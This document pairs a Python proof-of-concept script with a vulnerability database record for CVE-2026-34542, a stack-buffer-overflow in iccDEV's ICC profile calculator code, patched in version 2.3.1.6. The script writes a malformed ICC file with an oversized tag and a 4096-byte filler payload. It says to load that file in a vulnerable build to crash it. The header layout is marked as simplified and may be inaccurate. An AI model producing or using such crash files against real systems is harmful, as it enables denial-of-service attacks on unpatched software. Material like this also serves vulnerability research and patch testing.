CVE-2026-34542

# PoC for CVE-2026-34542 # Proof of concept to trigger stack-buffer-overflow in iccDEV import struct def generate_malformed_icc(filename): """ Generates a malformed ICC profile that attempts to trigger the overflow in CIccCalculatorFunc::Apply(). """ # Minimal ICC Header size = 0 cmm_type = b'acsp' version = struct.pack('>I', 0x02000000) device_class = b'scnr ' color_space = b'RGB ' pcs = b'XYZ ' date = b'\x00' * 12 magic = b'acsp' platform = b'APPL' flags = struct.pack('>I', 0) manufacturer = struct.pack('>I', 0) model = struct.pack('>I', 0) attributes = struct.pack('>Q', 0) intent = struct.pack('>I', 0) illuminant = struct.pack('>III', 0, 0, 0) # Simplified creator = struct.pack('>I', 0) header = (struct.pack('>I', 0) + # Placeholder for size cmm_type + version + device_class + color_space + pcs + date + magic + platform + flags + manufacturer + model + attributes + intent + illuminant + creator + b'\x00' * 44) # Tag table entry pointing to malicious data # Tag signature: 'mctr' (Multi Process Elements or similar) tag_sig = struct.pack('>I', 0x6D637472) tag_offset = struct.pack('>I', len(header) + 4) # Point after tag count tag_size = struct.pack('>I', 0x1000) # Large size to cause overflow tag_count = struct.pack('>I', 1) # Malicious payload intended to overflow the stack payload = b'A' * 0x1000 # Calculate total size total_size = len(header) + 4 + 12 + len(payload) header = struct.pack('>I', total_size) + header[4:] with open(filename, 'wb') as f: f.write(header) f.write(tag_count) f.write(tag_sig + tag_offset + tag_size) f.write(payload) if __name__ == "__main__": generate_malformed_icc('cve-2026-34542.icc') print("[+] Malformed ICC profile generated: cve-2026-34542.icc") print("[+] Load this file with a vulnerable version of iccDEV to trigger the crash.")

{"cve": {"id": "CVE-2026-34542", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:21.920", "lastModified": "2026-04-20T14:31:14.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a stack-buffer-overflow (SBO) in CIccCalculatorFunc::Apply() when processed via iccApplyNamedCmm. Under AddressSanitizer, the failure is reported as a 4-byte write stack-buffer-overflow in IccProfLib/IccMpeCalc.cpp:3873, reachable through the MPE calculator / curve set initialization path. This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado puede desencadenar un desbordamiento de búfer de pila (SBO) en CIccCalculatorFunc::Apply() cuando se procesa a través de iccApplyNamedCmm. Bajo AddressSanitizer, el fallo se informa como un desbordamiento de búfer de pila de escritura de 4 bytes en IccProfLib/IccMpeCalc.cpp:3873, accesible a través de la ruta de inicialización del calculador MPE / conjunto de curvas. Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/678", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/694", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-6749-6859-wf96", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}